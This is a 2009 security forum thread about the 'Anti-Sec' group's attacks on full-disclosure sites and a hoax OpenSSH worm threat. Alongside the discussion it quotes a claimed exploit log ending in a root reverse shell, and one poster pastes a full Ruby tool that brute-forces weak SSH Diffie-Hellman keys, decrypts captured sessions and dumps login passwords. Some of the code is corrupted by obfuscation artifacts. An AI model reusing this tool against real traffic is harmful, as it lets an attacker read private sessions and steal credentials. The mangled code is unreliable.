I found this amusing:
http://seclists.org/fulldisclosure/2009/Jul/0210.html
:cool:
Printable View
I found this amusing:
http://seclists.org/fulldisclosure/2009/Jul/0210.html
:cool:
Script-kiddies against script-kiddies...
That's some real 1337 skills there folks. :rolleyes:Quote:
anti-sec:~/pwn# ./litespeed_0day -t blackhat-forums.com -p80
[+] Connecting to blackhat-forums.com:80
[+] Connected Successfully!
[+] Checking for Lightspeed vulnerability...
[+] Vulnerable!
[+] Sending exploit
[-] Phase 1
[-] Phase 2
[-] Phase 3
[+] Injecting Shellcode...
[+] Waiting for reverse shell...
[~] Connected to shell @ 74.86.203.65!
<snip>
uid=0(root) gid=0 (root) groups=0 (root)
<snip>
I am not of the understanding? I must not be as uber l337 as I thought. Or I can't read.
Why would you even post that?
For the lulz; for victory!Quote:
Why would you even post that?
Ipse Dixit! :DQuote:
I am not of the understanding? I must not be as uber l337 as I thought. Or I can't read.
Because this forum happens to be called "Security News", and the fact that a new skiddies on the block group seeming to be hell bent on starting some kind of range war with full-disclosure sites is exactly what the forum title says.Quote:
Why would you even post that?
That, and the fact that the target site is still down...............which indicates that it is for real and not some hoax BS?
I have noticed that you like the "let me Google that for you" answer...........perhaps you should take a leaf out of your own book and see what furore has been caused on the "darkside", before making non-contributory posts? ;)
It was you, wasn't it .................. :lildevil:Quote:
For the lulz; for victory!
I didn't take it as him referring to you nihil, but to the anti-sec group... I could be wrong though. :DQuote:
Quote:
Why would you even post that?
Because this forum happens to be called "Security News", and the fact that a new skiddies on the block group seeming to be hell bent on starting some kind of range war with full-disclosure sites is exactly what the forum title says.
That, and the fact that the target site is still down...............which indicates that it is for real and not some hoax BS?
I have noticed that you like the "let me Google that for you" answer...........perhaps you should take a leaf out of your own book and see what furore has been caused on the "darkside", before making non-contributory posts?
Well,
Let's just say that there are certain members of another site, called the "*******" or somesuch, who delight in causing trouble here.
You will know the most obvious of them because it will be in their signatures ;)
Pax Vobiscum
Greetz.
This Anti-Sec group 1st made headlines when they succesfully pwned ImageShack>
Article at SlashDot
Quote:
Posted by Soulskill on Saturday July 11, @11:23AM
from the a-picture's-worth-a-couple-hundred-words-or-so dept.
"Last night a group calling themselves 'Anti-Sec' hacked ImageShack, one of the largest image hosting sites on the web, and replaced many of the site's hosted pictures with one of their own, which detailed their manifesto. The group's grievance is against full-disclosure of exploits, an issue that was debated recently after a presentation on an ATM exploit was canceled. Anti-Sec simply wants the practice within security circles to end, and they've promised to cause 'mayhem and destruction' if it doesn't. These people are taking direct aim against a sector of the IT industry that is already armed to fight the ... but they also already know that. It should be interesting to see how this plays out."
And as far as them being "Skiddies"... Well don't count on it... ;)
You're not looking at the big picture.
These people have created forums where the topic of choice is victimising internet users.
What they don't realise is that ddos attacks, spamming, defacements, and general trolling is just the sort of response the internet at large has in return.
Dude don't get your panties in a wad. I should have said "Why would 'THEY' even post that"Quote:
Originally Posted by dinowuff
It's called sarcasm and was directed at the uber l337 hax0rs post, not your link.
Quote:
And as far as them being "Skiddies"... Well don't count on it...
I don't know about that. Now days even botnet servers have point and click CNC.
That's command and control (also sarcasm - but true)
Here's a link for ya Nihil http://www.antionline.com/images/ieimages/2009/07/1.jpg
Looks like they have been around for quite a while. Here is a blog post about them from April of 2006:
http://blog.ncircle.com/archives/200...ement_why.html
Edit:
Actually it looks like they have been around since 1999 or so...
Very true...........if you visit their sites, the content is about showing how uber 31337 you are, rather than any real full-disclosure and analysis.Quote:
These people have created forums where the topic of choice is victimising internet users.
What they don't realise is that ddos attacks, spamming, defacements, and general trolling is just the sort of response the internet at large has in return.
I notice that blackhat-forums is still offline :D
As for why these people sent the e-mail, that should be perfectly obvious if you think about it?
There are loads of perfectly innocuous reasons why a site goes down or is unavailable................if you have killed a site for some socio-political motive or whatever, you need to advertise that fact.
EDIT:
It seems that they destroyed the Astalavista sites in June 2009:
http://www.ilovebonnie.net/2009/06/0...stacom-hacked/
This is an interesting one from 4 July 2009. That's after they zapped Astalavista and before they defaced Image Shack.
What is strange is that this is a small webservices and wehosting site in New Zealand. The log is here:
http://www.pastebinfail.com/2009/07/...-hack-log.html
The motive given is:
It worked as can be seen from the website:Quote:
- - Why SSANZ?
- Owned by a kid who claims he can manage, secure and audit servers,
- he offers a service that he clearly cannot provide, we are against that.
http://www.ssanz.net/
Now, I would suggest that if every small service provider were taken to task on what they say and what they do, there would be hundreds of such cases.................but there is only this one?
Totally insignificant by comparison with Image Shack, Astalavista and Blackhat-forums. Also, Image Shack looks like a simple publicity stunt (they did no deliberate damage) and the other two fit their manifesto, so where does SSANZ fit in?
http://www.webhostingtalk.com/showthread.php?t=854441
AND:-
http://ptc-investgations.blogspot.co...ecom-scam.html
Looks like LoganNZ has been p1$$ing people off..........and there are more links on the net to support that ;) eg.
http://www.gpforums.co.nz/showthread...postid=6198073
http://forums.digitalpoint.com/showt...=logan+nz+scam
And maybe he shouldn't have run over his neighbour's cat :lildevil:
Out of all the webserver out there, these people probably deserve it the most. Who cares.
http://archives.neohapsis.com/archiv...9-07/0279.html
:dunce:Quote:
[Full-disclosure] anti-sec: OpenSSH <= 5.2 zero day exploit code - 48 hours until it is publicly released!
From: Ant-Sec Movement (anti.sec.movementhttp://archives.neohapsis.com/imgs/at.gifgmail.com)
Date: Mon Jul 20 2009 - 01:32:18 CDT
Dear Reader,
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.
Soon, the very foundations of Information Technology and Information
Security will be unearthed as millions upon million of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddie and
malicious hacker.
Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
anti-sec will be unleashing powerful computer worm source code with the
ability to auotmatically find and compromise systems running any and all
versions of OpenSSH.
This is an attack against all White Hat Hackers who think that running a
Penetration Test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-sec will savor the moment when
White Hat Hackers are made to look like fools in the eyes of their clients.
Sincerely,
-anti-sec
I tend to believe these guys more than the average blog/hype/rumor mill
http://isc.sans.org/diary.html?storyid=6742
Yeah...................can I have a bottle of it.....................you seem to have lost a whole 12 days :drink:Quote:
I tend to believe these guys more than the average blog/hype/rumor mill
And from the trusted guys, who basically admit they don't know what the hell is going down:Quote:
From: Ant-Sec Movement (anti.sec.movementhttp://archives.neohapsis.com/imgs/at.gifgmail.com)
Date: Mon Jul 20 2009 - 01:32:18 CDT
At this point I think that this is a hoax. Clever, but there are distinctive differences between the style of this second missive and the first.Quote:
OpenSSH Rumors
Published: 2009-07-07,
Last Updated: 2009-07-08 00:08:11 UTC
by Marcus Sachs (Version: 4)
OK they could have been written by a different guy, but the second message certainly tries to ape the first?
I am confused. Are these guys for or against full disclosure. I am getting mixed signals here...
Quote:
This is primarily to
prove that we are serious and committed to our primary goal
- eradicating full-disclosure of computer vulnerabilities and exploits, and
terminating general discussion of hacking for any n00b and script-kiddie to
read and review - and learn from.
And then...Quote:
We are coming for you hackforums.net...and Milw0rm.com. We haven't forgotten
you, Milw0rm. Our juicy Apache 0-day will terminate both websites, which
will cause a major blow to those who support full-disclosure of hacking
related information.
Wait... what?Quote:
In 48 hours, the anti-sec movement will publicly unveil working exploit code
and full details for the zero-day OpenSSH vulnerability we discovered. It
will be posted to the Full-Disclosure security list.
12 days? Hell damn near an entire year...Quote:
Originally Posted by nihil
puts " * deciphered streams saved to #{cfile.inspect} & #{sfile.inspect}"Code:#!/usr/bin/env ruby
# ssh_decoder
#
# Copyright 2008 Yoann Guillot, Raphaƫl Rigo
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# usage : ./decryptssh.rb [-v] clientserver_stream.dat serverclient_stream.dat (order does not matter)
# use tcpick to create streams from a pcap
# most options are forwarded to ./keygen
require 'optparse'
opts = {:pidrange => '0-0x7fff', :cpus => 1 }
OptionParser.new { |o|
o.on('-n cpus', '--n-cpu cpus') { |i| opts[:cpus] = i.to_i }
o.on('-h num', '--child-pid num') { |i| opts[:child_pid] = i.to_i }
o.on('-p pidrange', '--pid-range pidrange') { |i| opts[:pidrange] = i }
o.on('-s', '--server', '--vulnerable-server') { |i| opts[:client] = false }
o.on('-c', '--client', '--vulnerable-client') { |i| opts[:client] = true }
o.on('-S shared_secret_hex', '--secret shared_secret_hex', '--shared-secret shared_secret_hex') { |i| opts[:shared] = i }
o.on('-v') { $VERBOSE = true }
}.parse!(ARGV)
class Stream
attr_accessor :data, :ptr, :banner, :maclen, :deciphlen, :decipher, :packets, :compr
def initialize(str)
@data = str
@ptr = 0
@maclen = 0
@banner = ''
@packets = []
@decipher = nil
@compr = nil
end
def read([email protected]@ptr)
@ptr += len
@data[@ptr-len, len].to_s
end
def readbanner
@banner = read(@data.index("\n", @ptr)-@ptr+1)
puts @banner if $VERBOSE
@banner
end
def readpacket
ciphlen = CipherBlockSize[@decipher.name] rescue nil if @decipher
ciphlen ||= 16
buf = read(ciphlen)
buf = @decipher.update(buf) if @decipher
p buf if $DEBUG
length = buf.unpack('N').first
if length > 0x10_0000
@decipher.update read(16)
mac = read(@maclen)
@packets << SshPacket.new(buf.length+1, 0.chr+buf, '', mac)
return @packets.last
end
tbuf = read(length + 4 - ciphlen)
tbuf = @decipher.update(tbuf) if @decipher and not tbuf.empty?
buf = buf[4..-1] << tbuf
mac = read(@maclen)
pad = buf[0]
payload = buf[1...-pad]
pad = buf[-pad, pad]
case @compr
when 'none'
when 'zlib': payload = @zlib.inflate(payload)
end
@packets << SshPacket.new(length, payload, pad, mac)
@packets.last
end
def readstream
@zlib = ZLib::Inflate.new(nil) if @compr == 'zlib'
nil while @ptr < @data.length and not ['DISCONNECT', 'NEWKEYS'].include? readpacket.type
puts if $VERBOSE
end
def [](type)
return @packets.find { |pkt| pkt.type == type }
end
def to_s
@packets.join(', ')
end
end
class SshPacket
SSH_MSG = {
'DISCONNECT' => 1,
'IGNORE' => 2,
'UNIMPLEMENTED' => 3,
'DEBUG' => 4,
'SERVICE_REQUEST' => 5,
'SERVICE_ACCEPT' => 6,
'KEXINIT' => 20,
'NEWKEYS' => 21,
'DH_GEX_REQUEST_OLD' => 30,
'DH_GEX_GROUP' => 31,
'DH_GEX_INIT' => 32,
'DH_GEX_REPLY' => 33,
'DH_GEX_REQUEST' => 34,
'USERAUTH_REQUEST' => 50,
'USERAUTH_FAILURE' => 51,
'USERAUTH_SUCCESS' => 52,
'USERAUTH_BANNER' => 53,
'CHANNEL_OPEN' => 90,
'CHANNEL_OPEN_CONFIRMATION' => 91,
'CHANNEL_OPEN_FAILURE' => 92,
}
attr_accessor :length, :payload, :pad, :mac, :interpreted, :type
def initialize(length, payload, pad, mac)
@length, @payload, @pad, @mac = length, payload, pad, mac
interpret
end
def bin
[@length].pack('N') << @pad.length << @payload << @pad
end
def to_s
@payload
end
def interpret
ptr = 0
read = proc { |n| ptr += n ; @payload[ptr-n, n].to_s }
readint = proc { read[4].unpack('N').first }
readstr = proc { read[readint[]] }
readstrlist = proc { readstr[].split(',') }
@type = read[1][0]
if SSH_MSG.index(@type)
@type = SSH_MSG.index(@type)
end
case @type
when 'KEXINIT'
@interpreted = { :cookie => read[16],
:kex_algorithms => readstrlist[],
:server_host_key_algorithms => readstrlist[],
:ciph_c2s => readstrlist[],
:ciph_s2c => readstrlist[],
:mac_c2s => readstrlist[],
:mac_s2c => readstrlist[],
:compr_c2s => readstrlist[],
:compr_s2c => readstrlist[],
:lang_c2s => readstrlist[],
:lang_s2c => readstrlist[],
:first_kex_follows => read[1][0],
:reserved => read[4]
}
when 'DH_GEX_INIT'
@interpreted = { :e => readstr[] }
when 'DH_GEX_GROUP'
@interpreted = { :p => readstr[], :g => readstr[] }
when 'DH_GEX_REPLY'
@interpreted = { :key => readkeyblob(readstr[]), :f => readstr[], :sign => readstr[] }
when 'SERVICE_REQUEST', 'SERVICE_ACCEPT'
@interpreted = { :service => readstr[] }
when 'DISCONNECT'
@interpreted = { :reason => readint[], :msg => readstr[], :lang => readstr[] }
when 'USERAUTH_REQUEST'
@interpreted = { :username => readstr[], :nextservice => readstr[], :auth_method => readstr[] }
case @interpreted[:auth_method]
when 'none'
when 'password'
@interpreted[:change] = read[1][0]
@interpreted[:password] = readstr[]
when 'publickey'
@interpreted[:testic] = read[1][0]
@interpreted[:keytype] = readstr[]
@interpreted[:key] = readkeyblob(readstr[])
else
@interpreted[:data] = read[@payload.length]
end
when 'USERAUTH_FAILURE'
@interpreted = { :meth_allowed => readstr[] }
when 'USERAUTH_SUCCESS'
@interpreted = {}
when 'CHANNEL_DATA'
@interpreted = { :wat => readint[], :data => readstr[] }
if @interpreted[:wat] == 0
@interpreted.delete :wat
p @interpreted[:data] if $VERBOSE
return
end
when 'CHANNEL_CLOSE'
@interpreted = { :foo => readint[] }
else
@interpreted = { :data => read[@payload.length-1] }
end
p @type, @interpreted if $VERBOSE
end
def [](x)
@interpreted[x]
end
end
def readkeyblob(str)
ptr = 0
read = proc { |n| ptr += n ; str[ptr-n, n] }
readstr = proc { read[read[4].unpack('N').first] }
ret = {}
ret[:type] = readstr[]
case ret[:type]
when 'ssh-rsa': [:e, :n]
when 'ssh-dss': [:p, :q, :g, :y] # TODO check order
else ret[:unknown] = read[str.length] ; []
end.map { |k| ret[k] = readstr[] }
ret
end
def makekeyblob(key)
key[:type].sbin +
case key[:type]
when 'ssh-rsa': [:e, :n]
when 'ssh-dss': [:p, :q, :g, :y]
end.map { |e| key[e].sbin }.join
end
def find_matching_alg(client, server)
client.find { |c| server.include? c }
end
class String
def sbin
[length].pack('N') << self
end
def allhex
self.unpack('H*')
end
end
require 'openssl'
CipherKeySize = {
"none" => 8,
"des" => 8, "3des" => 16, "3des-cbc" => 24,
"blowfish" => 32, "blowfish-cbc" => 16,
"cast128-cbc" => 16,
"arcfour" => 16, "arcfour128" => 16, "arcfour256" => 32,
"aes128-cbc" => 16, "aes192-cbc" => 24, "aes256-cbc" => 32,
"[email protected]" => 32,
"aes128-ctr" => 16, "aes192-ctr" => 24, "aes256-ctr" => 32,
}
CipherBlockSize = {
"none" => 8,
"des" => 8, "3des" => 8, "3des-cbc" => 8,
"blowfish" => 8, "blowfish-cbc" => 8,
"cast128-cbc" => 8,
"arcfour" => 8, "arcfour128" => 8, "arcfour256" => 8,
"aes128-cbc" => 16, "aes192-cbc" => 16, "aes256-cbc" => 16,
"[email protected]" => 16,
"aes128-ctr" => 16, "aes192-ctr" => 16, "aes256-ctr" => 16,
}
class AESCtr
attr_accessor :aes
def initialize(bitsize=128)
@aes = OpenSSL::Cipher::Cipher.new("aes-#{bitsize}-ecb")
@aes.encrypt
@tmpbuf = ''
end
def update(data)
@tmpbuf << data
ret = ''
while @tmpbuf.length >= 16
buf = @tmpbuf[0, 16]
@tmpbuf = @tmpbuf[16..-1]
ciph = @aes.update(@iv)
increment_counter
ret << buf.unpack('C*').zip(ciph.unpack('C*')).map { |a, b| a^b }.pack('C*')
end
ret
end
def increment_counter
16.times { |i|
i = 15-i
if @iv[i] == 255
@iv[i] = 0
else
@iv[i] += 1
break
end
}
end
def iv=(iv) @iv = iv[0, 16] end
def iv ; @iv end
def decrypt ; end
def encrypt ; end
def method_missing(*a)
@aes.send(*a)
end
end
# open the streams
stream1 = Stream.new File.open(ARGV.shift, 'rb') { |fd| fd.read }
stream2 = Stream.new File.open(ARGV.shift, 'rb') { |fd| fd.read }
# read the streams
puts " * read handshake"
abort '1st file has no SSH banner' if stream1.readbanner[0, 4] != 'SSH-'
stream1.readstream
abort '2nd file has no SSH banner' if stream2.readbanner[0, 4] != 'SSH-'
stream2.readstream
# TODO : detect vulnerable OpenSSH versions based on banners
# identify client/server
# TODO : handle shitty clients/servers like dropbear which do not use GEX
# but instead use predefined groups
cs = [stream1, stream2].find { |stream| stream['DH_GEX_INIT' ] }
ss = [stream1, stream2].find { |stream| stream['DH_GEX_REPLY'] }
# determine algorithms
kex_c = cs['KEXINIT']
kex_s = ss['KEXINIT']
cipher = find_matching_alg(cs['KEXINIT'][ :ciph_c2s], ss['KEXINIT'][ :ciph_s2c])
mac = find_matching_alg(cs['KEXINIT'][ :mac_c2s], ss['KEXINIT'][ :mac_s2c])
compr = find_matching_alg(cs['KEXINIT'][:compr_c2s], ss['KEXINIT'][:compr_s2c])
# for kex_hash get the last part of the algorithm names
kex_hash = find_matching_alg(cs['KEXINIT'][:kex_algorithms], ss['KEXINIT'][:kex_algorithms]).split('-').last
puts "cipher: #{cipher}, mac: #{mac}, kex_hash: #{kex_hash}, compr: #{compr}"
puts " * bruteforce DH"
groupinfo = ss['DH_GEX_GROUP']
gex_reply = ss['DH_GEX_REPLY']
gex_init = cs['DH_GEX_INIT']
needed_bits = CipherKeySize[cipher] * 8 * 2
if opts[:client]
weak_key = gex_init[:e].allhex
other_key = gex_reply[:f].allhex
else
other_key = gex_init[:e].allhex
weak_key = gex_reply[:f].allhex
end
if opts[:shared]
shared_secret = opts[:shared]
else
args = { 'b' => needed_bits, 'p' => opts[:pidrange], (opts[:client] ? 'c' : 's') => '',
'G' => groupinfo[:g].allhex, 'P' => groupinfo[:p].allhex,
'k' => weak_key, 'K' => other_key, 'n' => opts[:cpus]}
if not opts[:client]
args.update 'r' => gex_reply[:key][:n].allhex if gex_reply[:key][:n]
args.update 'h' => opts[:child_pid] if opts[:child_pid]
end
commandline = "./keygen " + args.sort.map { |k, v| "-#{k} #{v}" }.join(' ')
puts commandline if $VERBOSE
ENV['ENVIRON'] = "ubuntu-7.04-x86-patched" if not ENV['ENVIRON']
bruteforce_out = `LD_LIBRARY_PATH=$PWD/$ENVIRON/ LD_PRELOAD=$PWD/$ENVIRON/fakepid.so $PWD/$ENVIRON/ld-linux.so.2 #{commandline}`
puts bruteforce_out if $VERBOSE
abort "Bruteforce failed" if not $?.exited? or $?.exitstatus != 0
shared_secret = bruteforce_out.split("\n")[-2]
shared_secret = '00' + shared_secret if shared_secret[0, 1].to_i(16) >= 8
end
puts "DH shared secret : " + shared_secret
puts " * derive keys"
dh_size_request = (cs['DH_GEX_REQUEST'] || cs['DH_GEX_REQUEST_OLD']).payload[1..-1]
blob = [cs.banner.chomp, ss.banner.chomp, cs['KEXINIT'].payload, ss['KEXINIT'].payload,
makekeyblob(gex_reply[:key])].map { |e| e.sbin }.join + dh_size_request +
[groupinfo[:p], groupinfo[:g], gex_init[:e], gex_reply[:f], [shared_secret].pack('H*')].map { |e| e.sbin }.join
puts blob.allhex.first.scan(/.{0,32}/) if $DEBUG
handshake_hash = OpenSSL::Digest::Digest.digest(kex_hash, blob).allhex.first
puts "handshake hash : " + handshake_hash if $VERBOSE
we_need = CipherKeySize[cipher]
session_id = handshake_hash
derived = ['A', 'B', 'C', 'D', 'E', 'F'].map { |let|
k_h = [shared_secret.length/2, shared_secret].pack('NH*') + [handshake_hash].pack('H*')
key = OpenSSL::Digest::Digest.digest(kex_hash, k_h + let + [session_id].pack('H*'))
# Derive a longer key if needed
while key.length < we_need
key << OpenSSL::Digest::Digest.digest(kex_hash, k_h+key)
end
key[0, we_need]
}
puts 'derived keys : ', derived.map { |k| k.allhex } if $VERBOSE
puts ' * decipher streams'
cipher = OpenSSL::Cipher.ciphers.find { |cp| cp.gsub('-', '').downcase == cipher.gsub('-', '').downcase } || cipher # 'aes128-cbc' => 'aes-128-cbc'
puts "Cipher : #{cipher}" if $VERBOSE
case cipher
when /aes(\d+)-ctr/i
bitsize = $1.to_i
c2s = AESCtr.new bitsize
s2c = AESCtr.new bitsize
else
c2s = OpenSSL::Cipher::Cipher.new(cipher)
s2c = OpenSSL::Cipher::Cipher.new(cipher)
c2s.decrypt
s2c.decrypt
end
c2s.padding = 0
c2s.iv = derived[0]
c2s.key = derived[2]
cs.decipher = c2s
cs.compr = compr
s2c.padding = 0
s2c.iv = derived[1]
s2c.key = derived[3]
ss.decipher = s2c
ss.compr = compr
case mac
when 'hmac-md5'
cs.maclen = ss.maclen = 16
when 'hmac-sha1'
cs.maclen = ss.maclen = 20
else
raise 'unsupported HMAC'
end
cs.readstream
ss.readstream
# dump credentials
if ss['USERAUTH_SUCCESS']
puts ' * successful authentication packet'
auth = cs.packets.find_all { |p| p.type == 'USERAUTH_REQUEST' }.last
begin
require 'pp'
pp auth.interpreted
rescue LoadError
p auth.interpreted
end
end
# dump streams
i = 0
i += 1 while File.exist?(cfile = "sshdecrypt.#{i}.client.dat") or File.exist?(sfile = "sshdecrypt.#{i}.server.dat")
File.open(cfile, 'wb') { |fd| cs.packets.each { |p| fd.write p.payload } }
File.open(sfile, 'wb') { |fd| ss.packets.each { |p| fd.write p.payload } }
That is one of the inconsistencies that makes me suspect that the second manifesto is a hoax. Also:Quote:
I am confused. Are these guys for or against full disclosure. I am getting mixed signals here...
I am pretty sure that was not written by the same person as the first manifesto.Quote:
From: Ant-Sec Movement (anti.sec.movementhttp://archives.neohapsis.com/imgs/at.gifgmail.com)Date: Mon, Jul 20 2009 - 01:32:18 CDT Different format & timezone.....looks like Australia or the USA? at +10 hours the first one should be Australia.Dear Reader,
************************************* Missing space
In 48 hours, the Anti-Sec movement will publicly unveil working exploit code
and full details for (of) the zero-day OpenSSH vulnerability we discovered. It will be posted to the Full-Disclosure security list. Capitalisation, grammar & punctuation
Soon, the very foundations of Information Technology and Information
Security will be unearthed, as millions upon million of systems running ANY
version of OpenSSH are compromised by wave after wave of script-kiddies and malicious hackers. Plurals & punctuation
Within 10 hours of the initial release of the OpenSSH 0-day exploit code,
Anti-Sec will be unleashing powerful computer worm source code with the
ability to auotmatically find and compromise systems running any and all
versions of OpenSSH. Capitalisation typo, phrase is wrong way round
This is an attack against all White Hat Hackers who think that running a
penetration test simply searching for known vulnerabilities is all they have
to do in order to receive their payment. Anti-Sec will savor the moment when White Hat Hackers are made to look like fools in the eyes of their clients. Incorrect capitalisation, missing capitalisation
Sincerely,
-anti-sec
Looks like it was a hoax just like I thought:
http://www.theregister.co.uk/2009/07/20/anti_sec_spoof/
:)Quote:
Pranksters have latched onto Anti-Sec's quixotic crusade against full disclosure of security vulnerabilities by impersonating the group in a threat to unleash an OpenSSH exploit.
EDIT: I now think that the first post was also a hoax from the same group, but by another person.
My feeling is that both posts were from Asian students at an Australian university. ;)